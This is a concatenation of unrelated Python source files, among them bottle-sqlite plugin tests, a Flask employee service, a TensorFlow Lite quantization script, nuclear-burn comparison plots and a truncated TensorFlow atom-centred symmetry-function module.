self.assertAlmostEqual(avg[1], 0.5)
if __name__ == "__main__":
unittest.main()
|
nilq/baby-python
|
python
|
import graphene
from graphql_auth.bases import MutationMixin, DynamicArgsMixin
from users.mixins import PasswordSetAdminMixin
class PasswordSetAdmin(MutationMixin, DynamicArgsMixin, PasswordSetAdminMixin, graphene.Mutation):
_required_args = ["new_password1", "new_password2"]
class Arguments:
id = graphene.ID(required=True)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import os
import unittest
import sqlite3
import tempfile
import bottle
from bottle.ext import sqlite
''' python3 moves unicode to str '''
try:
unicode
except NameError:
unicode = str
class SQLiteTest(unittest.TestCase):
def setUp(self):
self.app = bottle.Bottle(catchall=False)
_, dbfile = tempfile.mkstemp(suffix='.sqlite')
self.plugin = self.app.install(sqlite.Plugin(dbfile=dbfile))
self.conn = sqlite3.connect(dbfile)
self.conn.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
self.conn.commit()
def tearDown(self):
os.unlink(self.plugin.dbfile)
def test_with_keyword(self):
@self.app.get('/')
def test(db):
self.assertEqual(type(db), type(sqlite3.connect(':memory:')))
self._request('/')
def test_without_keyword(self):
@self.app.get('/')
def test_1():
pass
self._request('/')
@self.app.get('/2')
def test_2(**kw):
self.assertFalse('db' in kw)
self._request('/2')
def test_install_conflicts(self):
self.app.install(sqlite.Plugin(keyword='db2'))
@self.app.get('/')
def test(db, db2):
pass
# I have two plugins working with different names
self._request('/')
def test_text_factory(self):
# set text factory to str, unicode (default) would cause
# PrammingError: You must not use 8-bit bytestrings .. exception
self.app.install(sqlite.Plugin(keyword='db2',text_factory=str))
@self.app.get('/')
def test(db, db2):
char = 'ööö'
db2.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
db2.execute("INSERT INTO todo (id,task) VALUES ('1',:TEST)", { "TEST": char })
count = len(db2.execute("SELECT * FROM todo").fetchall())
self.assertEqual(count, 1)
self._request('/')
def test_text_factory_fail(self):
self.app.install(sqlite.Plugin(keyword='db3',text_factory=unicode))
@self.app.get('/')
def test(db, db3):
char = 'ööö'
db3.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
try:
db3.execute("INSERT INTO todo (id,task) VALUES ('1',:TEST)", { "TEST": char })
except sqlite3.ProgrammingError as e:
pass
self._request('/')
def test_user_functions(self):
class SumSq:
def __init__(self):
self.result = 0
def step(self, value):
if value:
self.result += value**2
def finalize(self):
return self.result
def collate_reverse(string1, string2):
if string1 == string2:
return 0
elif string1 < string2:
return 1
else:
return -1
testfunc1 = lambda: 'test'
testfunc2 = lambda x: x + 1
self.app.install(sqlite.Plugin(
keyword='db4',
functions={'testfunc1': (0, testfunc1), 'testfunc2': (1, testfunc2)},
aggregates={'sumsq': (1, SumSq)},
collations={'reverse': collate_reverse},
))
@self.app.get('/')
def test(db, db4):
db4.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
result = db4.execute("SELECT testfunc1(), testfunc2(2)").fetchone()
self.assertEqual(tuple(result), ('test', 3))
db4.execute("INSERT INTO todo VALUES (10, 'a')")
db4.execute("INSERT INTO todo VALUES (11, 'a')")
db4.execute("INSERT INTO todo VALUES (12, 'a')")
result = db4.execute("SELECT sumsq(id) FROM todo WHERE task='a'").fetchone()
self.assertEqual(tuple(result), (365,))
result = db4.execute("SELECT ('a' < 'b' COLLATE reverse)").fetchone()
self.assertEqual(tuple(result), (0,))
self._request('/')
def test_raise_sqlite_integrity_error(self):
@self.app.get('/')
def test(db):
# task can not be null, raise an IntegrityError
db.execute("INSERT INTO todo (id) VALUES (1)")
# TODO: assert HTTPError 500
self._request('/')
self.assert_records(0)
def test_autocommit(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
self._request('/')
self.assert_records(1)
def test_not_autocommit(self):
@self.app.get('/', sqlite={'autocommit': False})
def test(db):
self._insert_into(db)
self._request('/')
self.assert_records(0)
def test_commit_on_redirect(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
bottle.redirect('/')
self._request('/')
self.assert_records(1)
def test_commit_on_abort(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
bottle.abort()
self._request('/')
self.assert_records(0)
def _request(self, path, method='GET'):
return self.app({'PATH_INFO': path, 'REQUEST_METHOD': method},
lambda x, y: None)
def _insert_into(self, db):
sql = "INSERT INTO todo (task) VALUES ('PASS')"
db.execute(sql)
def assert_records(self, count):
cursor = self.conn.execute("SELECT COUNT(*) FROM todo")
self.assertEqual((count,), cursor.fetchone())
if __name__ == '__main__':
unittest.main()
|
nilq/baby-python
|
python
|
# This code is designed to compare the absolute difference between one
# reference burn_cell test and multiple other burn_cell tests.
# burn_cell_testing.py must be run before running this.
# Around line 195, you choose which elements you will compare the xn and ydot of
# To change what you investigate, you must change what indices in
# short_spec_names you are iterating over
#
# This code is not designed to analyze the error between tests from two networks
#!/usr/bin/env python
from __future__ import print_function
import argparse
import glob
import numpy as np
from cycler import cycler
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument('runprefix', type=str,
help='Prefix of the output run files. We look for files named as [prefix]_[0-9]*')
parser.add_argument('--filenum', action='store_true', help='If --filenum, plot vs. file number')
parser.add_argument('--logtime', action='store_true', help='If --logtime, plot Log10(time).')
parser.add_argument('--tlo', type=float, help='Time lower limit')
parser.add_argument('--thi', type=float, help='Time upper limit')
parser.add_argument('--nlo', type=float, help='File num lower limit')
parser.add_argument('--nhi', type=float, help='File num upper limit')
args = parser.parse_args()
# Initializing varibales and loading in data
print('Initializing')
runprefix = args.runprefix
file_testprefixes = open('{}_testprefixes.txt'.format(runprefix), 'r')
testprefixes = []
for line in file_testprefixes:
testprefixes.append('{}'.format(line.strip()))
file_testprefixes.close()
file_specs = open('{}_{}_short_spec_names.txt'.format(runprefix, testprefixes[0]), 'r')
short_spec_names = []
for line in file_specs:
short_spec_names.append(line.strip())
file_specs.close()
nspec = len(short_spec_names)
inputs = []
for i in range(len(testprefixes)):
# i corresponds to the index of a test prefix
inputs.append([])
file_inputs = open('{}_{}_inputs.txt'.format(runprefix, testprefixes[i]))
for line in file_inputs:
inputs[i].append('{}'.format(line.strip()))
file_inputs.close()
# Init time, temp, ener, xn, ydot
xn = []
ydot = []
fnum = []
temp = []
dtime = []
time = []
ener = []
denerdt = []
for prefix in range(len(testprefixes)):
xn.append([])
ydot.append([])
for n in range(nspec):
xn[prefix].append(np.loadtxt('{}_{}_xn{}.txt'.format(args.runprefix, testprefixes[prefix], n)))
ydot[prefix].append(np.loadtxt('{}_{}_ydot{}.txt'.format(args.runprefix, testprefixes[prefix], n)))
temp.append(np.loadtxt('{}_{}_temp.txt'.format(args.runprefix, testprefixes[prefix])))
ener.append(np.loadtxt('{}_{}_ener.txt'.format(args.runprefix, testprefixes[prefix])))
denerdt.append(np.loadtxt('{}_{}_denerdt.txt'.format(args.runprefix, testprefixes[prefix])))
dtime = np.loadtxt('{}_{}_dtime.txt'.format(args.runprefix, testprefixes[0]))
time = np.loadtxt('{}_{}_time.txt'.format(args.runprefix, testprefixes[0]))
fnum = np.loadtxt('{}_{}_fnum.txt'.format(args.runprefix, testprefixes[0]))
## Define RGBA to HEX
def rgba_to_hex(rgba):
r = int(rgba[0]*255.0)
g = int(rgba[1]*255.0)
b = int(rgba[2]*255.0)
return '#{:02X}{:02X}{:02X}'.format(r,g,b)
## PLOTTING
# Figure out time axis limits
if args.tlo and args.thi:
ltlim = [args.tlo, args.thi]
elif args.tlo:
ltlim = [args.tlo, time[-1]]
elif args.thi:
ltlim = [time[0], args.thi]
else:
ltlim = [time[0], time[-1]]
if args.logtime:
time = np.log10(time)
ltlim = np.log10(ltlim)
# Number axis limits
if args.nlo and args.nhi:
fnlim = [args.nlo, args.nhi]
elif args.tlo:
fnlim = [args.nlo, fnum[-1]]
elif args.thi:
fnlim = [fnum[0], args.nhi]
else:
fnlim = [fnum[0], fnum[-1]]
# Time or file number selection
if args.filenum or args.nlo or args.nhi:
plot_vs_fnum = True
xlabel = r'$\mathrm{Output \#}$'
xvec = fnum
xlim = fnlim
else:
xvec = time
xlim = ltlim
if args.logtime:
xlabel = r'$\mathrm{Log_{10}}$'
else:
xlabel = r'$\mathrm{Time~(s)}$'
# Get set of colors to use for abundances
cm = plt.get_cmap('nipy_spectral')
clist = [cm(1.0*i/nspec) for i in range(nspec)]
hexclist = [rgba_to_hex(ci) for ci in clist]
# Initialize figures and axes for the future plots
plt.figure(1, figsize=(6,9))
ax = plt.subplot(211)
ax.set_prop_cycle(cycler('color', hexclist))
errx = plt.subplot(212)
errx.set_prop_cycle(cycler('color', hexclist))
plt.figure(2, figsize=(6,9))
ay = plt.subplot(211)
ay.set_prop_cycle(cycler('color', hexclist))
erry = plt.subplot(212)
erry.set_prop_cycle(cycler('color', hexclist))
plt.figure(3, figsize=(5,9))
aT = plt.subplot(211)
errT = plt.subplot(212)
plt.figure(4, figsize=(5,9))
ae = plt.subplot(211)
erre = plt.subplot(212)
# Initialize arrays to contain values for plotting
diffx = []
diffydot = []
difftemp = []
diffdenerdt = []
line_styles = ['solid', 'dashed', 'dotted', 'dashdot']
# Plotting the reference data
print('Plotting the reference data from: {}'.format(testprefixes[0]))
for x in range(len(short_spec_names)):
# x corresponds to each molecule in the list of species
plt.figure(1)
ax.semilogy(xvec, xn[0][x], label='{}-{}'.format(short_spec_names[x], testprefixes[0]), linestyle = line_styles[0])
plt.figure(2)
ay.semilogy(xvec, ydot[0][x], label='{}-{}'.format(short_spec_names[x], testprefixes[0]), linestyle = line_styles[0])
plt.figure(3)
aT.semilogy(xvec, temp[0], label=testprefixes[0], linestyle = line_styles[0])
plt.figure(4)
ae.semilogy(xvec, denerdt[0], label=testprefixes[0], linestyle = line_styles[0])
# Plotting the data compared to reference and the error
for i in range(1, len(testprefixes)):
# In this context i cooresponds to a test prefix to be compared
# to the data from a chosen data set
print('Plotting data from: {}'.format(testprefixes[i]))
difftemp.append([])
diffdenerdt.append([])
for n in range(len(xvec)):
# n is for every time step from 0 to tmax
difftemp[i-1].append(abs(temp[0][n] - temp[i][n]))
diffdenerdt[i-1].append(abs(denerdt[0][n] - denerdt[i][n]))
plt.figure(3)
# Uncomment the following line and the commented ae, ax, and ay
# to add additional graphs to the top graph in the output files
#aT.semilogy(xvec, temp[i], label=testprefixes[i], linestyle = line_styles[i])
errT.semilogy(xvec, difftemp[i-1], label=testprefixes[i], linestyle = line_styles[i-1])
plt.figure(4)
#ae.semilogy(xvec, denerdt[i], label=testprefixes[i], linestyle = line_styles[i])
erre.semilogy(xvec, diffdenerdt[i-1], label=testprefixes[i], linestyle = line_styles[i-1])
diffx.append([])
diffydot.append([])
# This is where you decide which elements to investigate the xn and ydot of
for x in range(nspec):
# x is for each species involved
diffx[i-1].append([])
diffydot[i-1].append([])
for n in range(len(xvec)):
# n is for every time step from 0 to tmax
diffx[i-1][x].append(abs(xn[0][x][n] - xn[i][x][n]))
diffydot[i-1][x].append(abs(ydot[0][x][n] - ydot[i][x][n]))
plt.figure(1)
#ax.semilogy(xvec, xn[i][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i])
errx.semilogy(xvec, diffx[i-1][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i-1])
plt.figure(2)
#ay.semilogy(xvec, ydot[i][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i])
erry.plot(xvec, diffydot[i-1][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i-1])
# Mass Fraction Figure
print('Compiling Mass Fraction graph.')
plt.figure(1)
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])
ax.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
ax.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ax.transAxes)
ax.set_xlabel(xlabel, fontsize=10)
ax.set_ylabel('$\\mathrm{Log_{10} X}$', fontsize=10)
ax.set_title('Mass Fraction')
ax.set_xlim(xlim)
ax.tick_params(axis='both', which='both', labelsize=5)
box = errx.get_position()
errx.set_position([box.x0, box.y0, box.width * 0.8, box.height])
errx.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
errx.set_xlabel(xlabel, fontsize=10)
errx.set_ylabel('$\\mathrm{Log_{10} X}$', fontsize=10)
errx.set_title('Absolute Errors in Mass Fraction', fontsize=15)
errx.set_xlim(xlim)
errx.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_xn_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Moller Fractions
print('Compiling Moller Fraction graph.')
plt.figure(2)
box = ay.get_position()
ay.set_position([box.x0, box.y0, box.width * 0.8, box.height])
ay.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
ay.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ay.transAxes)
ay.set_xlabel(xlabel, fontsize=10)
ay.set_ylabel('$\\mathrm{Log_{10} \\dot{Y}}$', fontsize=10)
ay.set_title('Moller Fraction')
ay.set_xlim(xlim)
ay.tick_params(axis='both', which='both', labelsize=5)
box = erry.get_position()
erry.set_position([box.x0, box.y0, box.width * 0.8, box.height])
erry.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
erry.set_xlabel(xlabel, fontsize=10)
erry.set_ylabel('$\\mathrm{Log_{10} \\dot{Y}}$', fontsize=10)
erry.set_title('Absolute Errors in Moller Fraction', fontsize=15)
erry.set_xlim(xlim)
erry.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_y_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Temperature Figure
print('Compiling Temperature graph.')
plt.figure(3)
aT.legend(loc='upper left', fontsize = 5)
aT.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=aT.transAxes)
aT.set_xlabel(xlabel, fontsize=10)
aT.set_ylabel('$\\mathrm{Log_{10} T~(K)}$', fontsize=10)
aT.set_title('Temperature')
aT.set_xlim(xlim)
aT.tick_params(axis='both', which='both', labelsize=5)
errT.legend(loc='upper left', fontsize = 5)
errT.set_prop_cycle(cycler('color', hexclist))
errT.set_xlabel(xlabel, fontsize=10)
errT.set_ylabel('$\\mathrm{Log_{10} T~(K)}$', fontsize=10)
errT.set_title('Absolute Error in Temperature', fontsize=15)
errT.set_xlim(xlim)
errT.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_T_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Energy Generation Rate
print('Compiling Enerergy Generation Rate graph.')
plt.figure(4)
ae.legend(loc='upper left', fontsize = 5)
ae.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ae.transAxes)
ae.set_prop_cycle(cycler('color', hexclist))
ae.set_xlabel(xlabel, fontsize=10)
ae.set_ylabel('$\\mathrm{Log_{10} \\dot{e}~(erg/g/s)}$', fontsize=10)
ae.set_title('Energy Generation Rate')
ae.set_xlim(xlim)
ae.tick_params(axis='both', which='both', labelsize=5)
erre.legend(loc='upper left', fontsize = 5)
erre.set_prop_cycle(cycler('color', hexclist))
erre.set_xlabel(xlabel, fontsize=10)
erre.set_ylabel('$\\mathrm{Log_{10} \\dot{e}~(erg/g/s)}$', fontsize=10)
erre.set_title('Absolute Error in Energy Generation Rate', fontsize=15)
erre.set_xlim(xlim)
erre.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_edot_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
|
nilq/baby-python
|
python
|
#!/usr/bin/python
import socket,os
import platform
""" NETLINK related stuff
Astrit Zhushi 2011, a.zhushi@cs.ucl.ac.uk
"""
NETLINK_CONNECTOR=11
NETLINK_ADD_MEMBERSHIP=1
def get_cn_idx_iwlagn():
uname = platform.uname()[2]
infile = open("/usr/src/linux-headers-%s/include/linux/connector.h"
%(uname), "r")
flag = False
for line in infile:
if line.find("CN_IDX_IWLAGN") == -1:
continue
line = line.strip().split()
CN_IDX_IWLAGN = eval(line[2])
flag = True
break
infile.close()
if flag:
return CN_IDX_IWLAGN
raise IOError("CN_IDX_IWLAGN not found in connector.h")
def get_iwlnl_socket() :
CN_IDX_IWLAGN = get_cn_idx_iwlagn()
s = socket.socket(socket.AF_NETLINK, socket.SOCK_DGRAM, NETLINK_CONNECTOR)
pid = os.getpid()
s.bind((pid,CN_IDX_IWLAGN))
s.setsockopt(270, NETLINK_ADD_MEMBERSHIP, CN_IDX_IWLAGN)
return s
|
nilq/baby-python
|
python
|
"""
Employee service.
"""
from department_app import db
from department_app.models.department import Department
from department_app.models.employee import Employee
def add_employee_service(forename, surname, birthdate, department_id, salary):
"""
Adds employee to db.
:param forename: employee first name
:param surname: employee Surname
:param birthdate: employee birthdate
:param salary: employee salary
:param department_id: employee department id
:return: None
"""
employee = Employee(
forename=forename,
surname=surname,
birthdate=birthdate,
salary=salary,
department=department_id
)
db.session.add(employee)
db.session.commit()
def update_employee_service(employee_id, forename=None, surname=None, birthdate=None, salary=None, department_id=None):
"""
Updates employee into db.
:param employee_id: employee id
:param forename: employee first name
:param surname: employee Surname
:param birthdate: employee birthdate
:param salary: employee salary
:param department_id: employee department id
:return: None
"""
employee = Employee.query.get_or_404(employee_id)
if forename:
employee.forename = forename
if surname:
employee.surname = surname
if birthdate:
employee.birthdate = birthdate
if salary:
employee.salary = salary
if department_id:
employee.department_id = department_id
db.session.add(employee)
db.session.commit()
def get_employee_by_id_service(employee_id):
"""
Returns employee from db.
:param employee_id: employee id
:return: employee
"""
return Employee.query.filter_by(id=employee_id).first()
def get_by_birthdate_service(date_from, date_to):
"""
Returns all employees with birthdate in mentioned period from db.
:param date_from: start_date
:param date_to: end_date
:return: list of all employees with birthdate in mentioned period
"""
return Employee.query.filter(Employee.birthdate.between(date_from, date_to)).all()
def get_all_employees_service():
"""
Returns all employees from db.
:return: list of all employees
"""
return Employee.query.all()
def delete_employee_service(employee_id):
"""
Deletes employee in db.
:param employee_id: employee id
:return: None
"""
employee = Employee.query.get_or_404(employee_id)
db.session.delete(employee)
db.session.commit()
def employee_to_dict(employee_id):
"""
Returns employee dictionary representation.
:param employee_id: employee id
:return: employee dictionary representation
"""
employee = get_employee_by_id_service(employee_id)
return {
'id': employee.id,
'forename': employee.forename,
'surname': employee.surname,
'birthdate': employee.birthdate.strftime('%Y-%m-%d'),
'salary': employee.salary,
'department': Department.query.get_or_404(employee.department_id).name
}
def get_all_employees_for_department(department_id):
"""
Returns all employees in the department from database.
:param department_id: department id
:return: list of all employees in the department
"""
return Employee.query.filter_by(department_id=department_id).all()
|
nilq/baby-python
|
python
|
### tensorflow==2.3.1
import tensorflow as tf
import tensorflow_datasets as tfds
import numpy as np
def representative_dataset_gen_480x640():
for data in raw_test_data.take(10):
image = data['image'].numpy()
image = tf.image.resize(image, (480, 640))
image = image[np.newaxis,:,:,:]
image = image - 127.5
image = image * 0.007843
yield [image]
raw_test_data, info = tfds.load(name="coco/2017", with_info=True, split="test", data_dir="~/TFDS", download=False)
# Integer Quantization - Input/Output=float32
height = 480
width = 640
converter = tf.lite.TFLiteConverter.from_saved_model('saved_model_nyu_{}x{}'.format(height, width))
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.representative_dataset = representative_dataset_gen_480x640
tflite_model = converter.convert()
with open('dense_depth_nyu_{}x{}_integer_quant.tflite'.format(height, width), 'wb') as w:
w.write(tflite_model)
print('Integer Quantization complete! - dense_depth_nyu_{}x{}_integer_quant.tflite'.format(height, width))
|
nilq/baby-python
|
python
|
import bayesiancoresets as bc
import numpy as np
import warnings
warnings.filterwarnings('ignore', category=UserWarning) #tests will generate warnings (due to pathological data design for testing), just ignore them
np.seterr(all='raise')
np.set_printoptions(linewidth=500)
np.random.seed(100)
tol = 1e-9
def test_empty():
x = np.random.randn(0, 0)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones"
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
def test_one():
x = np.random.randn(1, 3)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones: "+str(fd.weights())
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
def test_many():
x = np.random.randn(10, 3)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones "+str(fd.weights())
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
|
nilq/baby-python
|
python
|
# MIT License
#
# Copyright (c) 2018 Silvia Amabilino
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module contains an implementation of the the symmetry functions used in the Parkhill paper https://arxiv.org/pdf/1711.06385.pdf.
This implementation is different. It works for both data sets where all the molecules are the same but in different configurations and
for datasets with all different molecules.
Note: it is all in single precision.
"""
import tensorflow as tf
import numpy as np
def acsf_rad(xyzs, Zs, radial_cutoff, radial_rs, eta):
"""
This does the radial part of the symmetry function (G2 function in Behler's papers). It works only for datasets where
all samples are the same molecule but in different configurations.
:param xyzs: tf tensor of shape (n_samples, n_atoms, 3) contaning the coordinates of each atom in each data sample
:param Zs: tf tensor of shape (n_samples, n_atoms) containing the atomic number of each atom in each data sample
:param radial_cutoff: scalar tensor
:param radial_rs: tf tensor of shape (n_rs,) with the R_s values
:param eta: tf scalar
:return: tf tensor of shape (n_samples, n_atoms, n_atoms, n_rs)
"""
# Calculating the distance matrix between the atoms of each sample
with tf.name_scope("Distances"):
dxyzs = tf.expand_dims(xyzs, axis=2) - tf.expand_dims(xyzs, axis=1)
dist_tensor = tf.cast(tf.norm(dxyzs, axis=3), dtype=tf.float32) # (n_samples, n_atoms, n_atoms)
# Indices of terms that need to be zero (diagonal elements)
mask_0 = tf.zeros(tf.shape(dist_tensor))
mask_1 = tf.ones(tf.shape(Zs))
where_eq_idx = tf.cast(tf.matrix_set_diag(mask_0, mask_1), dtype=tf.bool)
# Calculating the exponential term
with tf.name_scope("Exponential_term"):
expanded_rs = tf.expand_dims(tf.expand_dims(tf.expand_dims(radial_rs, axis=0), axis=0), axis=0) # (1, 1, 1, n_rs)
expanded_dist = tf.expand_dims(dist_tensor, axis=-1) # (n_samples, n_atoms, n_atoms, 1)
exponent = - eta * tf.square(tf.subtract(expanded_dist, expanded_rs))
exp_term = tf.exp(exponent) # (n_samples, n_atoms, n_atoms, n_rs)
# Calculating the fc terms
with tf.name_scope("fc_term"):
# Finding where the distances are less than the cutoff
where_less_cutoff = tf.less(dist_tensor, radial_cutoff)
# Calculating all of the fc function terms
fc = 0.5 * (tf.cos(3.14159265359 * dist_tensor / radial_cutoff) + 1.0)
# Setting to zero the terms where the distance is larger than the cutoff
zeros = tf.zeros(tf.shape(dist_tensor), dtype=tf.float32)
cut_off_fc = tf.where(where_less_cutoff, fc, zeros) # (n_samples, n_atoms, n_atoms)
# Cleaning up diagonal terms
clean_fc_term = tf.where(where_eq_idx, zeros, cut_off_fc)
# Cleaning up dummy atoms terms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
cleaner_fc_term = tf.where(dummy_mask, clean_fc_term, zeros)
# Multiplying exponential and fc terms
expanded_fc = tf.expand_dims(cleaner_fc_term, axis=-1) # (n_samples, n_atoms, n_atoms, 1)
with tf.name_scope("Rad_term"):
presum_term = tf.multiply(expanded_fc, exp_term) # (n_samples, n_atoms, n_atoms, n_rs)
return presum_term
def acsf_ang(xyzs, Zs, angular_cutoff, angular_rs, theta_s, zeta, eta):
"""
This does the angular part of the symmetry function as mentioned here: https://arxiv.org/pdf/1711.06385.pdf
It only works for systems where all the samples are the same molecule but in different configurations.
:param xyzs: tf tensor of shape (n_samples, n_atoms, 3) contaning the coordinates of each atom in each data sample
:param Zs: tf tensor of shape (n_samples, n_atoms) containing the atomic number of each atom in each data sample
:param angular_cutoff: scalar tensor
:param angular_rs: tf tensor of shape (n_ang_rs,) with the equivalent of the R_s values from the G2
:param theta_s: tf tensor of shape (n_thetas,)
:param zeta: tf tensor of shape (1,)
:param eta: tf tensor of shape (1,)
:return: tf tensor of shape (n_samples, n_atoms, n_atoms, n_atoms, n_ang_rs * n_thetas)
"""
# Finding the R_ij + R_ik term
with tf.name_scope("Sum_distances"):
dxyzs = tf.expand_dims(xyzs, axis=2) - tf.expand_dims(xyzs, axis=1)
dist_tensor = tf.cast(tf.norm(dxyzs, axis=3), dtype=tf.float32) # (n_samples, n_atoms, n_atoms)
# This is the tensor where element sum_dist_tensor[0,1,2,3] is the R_12 + R_13 in the 0th data sample
sum_dist_tensor = tf.expand_dims(dist_tensor, axis=3) + tf.expand_dims(dist_tensor,
axis=2) # (n_samples, n_atoms, n_atoms, n_atoms)
# Problem with the above tensor: we still have the R_ii + R_ik distances which are non zero and could be summed
# These need to be set to zero
n_atoms = Zs.get_shape().as_list()[1]
zarray = np.zeros((n_atoms, n_atoms, n_atoms))
for i in range(n_atoms):
for j in range(n_atoms):
for k in range(n_atoms):
if i == j or i == k or j == k:
zarray[i, j, k] = 1
# Make a bool tensor of the indices
where_eq_idx = tf.tile(tf.expand_dims(tf.convert_to_tensor(zarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(sum_dist_tensor)[0], 1, 1, 1])
# For all the elements that are true in where_eq_idx, turn the elements of sum_dist_tensor to zero
zeros_1 = tf.zeros(tf.shape(sum_dist_tensor), dtype=tf.float32)
# Now finding the fc terms
with tf.name_scope("Fc_term"):
# 1. Find where Rij and Rik are < cutoff
where_less_cutoff = tf.less(dist_tensor, angular_cutoff)
# 2. Calculate the fc on the Rij and Rik tensors
fc_1 = 0.5 * (tf.cos(3.14159265359 * dist_tensor / angular_cutoff) + 1.0)
# 3. Apply the mask calculated in 1. to zero the values for where the distances are > than the cutoff
zeros_2 = tf.zeros(tf.shape(dist_tensor), dtype=tf.float32)
cut_off_fc = tf.where(where_less_cutoff, fc_1, zeros_2) # (n_samples, n_atoms, n_atoms)
# 4. Multiply the two tensors elementwise
fc_term = tf.multiply(tf.expand_dims(cut_off_fc, axis=3),
tf.expand_dims(cut_off_fc, axis=2)) # (n_samples, n_atoms, n_atoms, n_atoms)
# 5. Cleaning up the terms that should be zero because there are equal indices
clean_fc_term = tf.where(where_eq_idx, zeros_1, fc_term)
# 6. Cleaning up the terms due to the dummy atoms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask_2d = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
dummy_mask_3d = tf.logical_and(tf.expand_dims(dummy_mask_2d, axis=1), tf.expand_dims(tf.expand_dims(dummy_atoms, axis=-1), axis=-1))
cleaner_fc_term = tf.where(dummy_mask_3d, clean_fc_term, zeros_1)
# Now finding the theta_ijk term
with tf.name_scope("Theta"):
# Doing the dot products of all the possible vectors
dots_dxyzs = tf.cast(tf.reduce_sum(tf.multiply(tf.expand_dims(dxyzs, axis=3), tf.expand_dims(dxyzs, axis=2)),
axis=4), dtype=tf.float32) # (n_samples, n_atoms, n_atoms, n_atoms)
# Doing the products of the magnitudes
dist_prod = tf.multiply(tf.expand_dims(dist_tensor, axis=3),
tf.expand_dims(dist_tensor, axis=2)) # (n_samples, n_atoms, n_atoms, n_atoms)
# Dividing the dot products by the magnitudes to obtain cos theta
cos_theta = tf.divide(dots_dxyzs, dist_prod)
# Taking care of the values that due numerical error are just above 1.0 or below -1.0
cut_cos_theta = tf.clip_by_value(cos_theta, tf.constant(-1.0), tf.constant(1.0))
# Applying arc cos to find the theta value
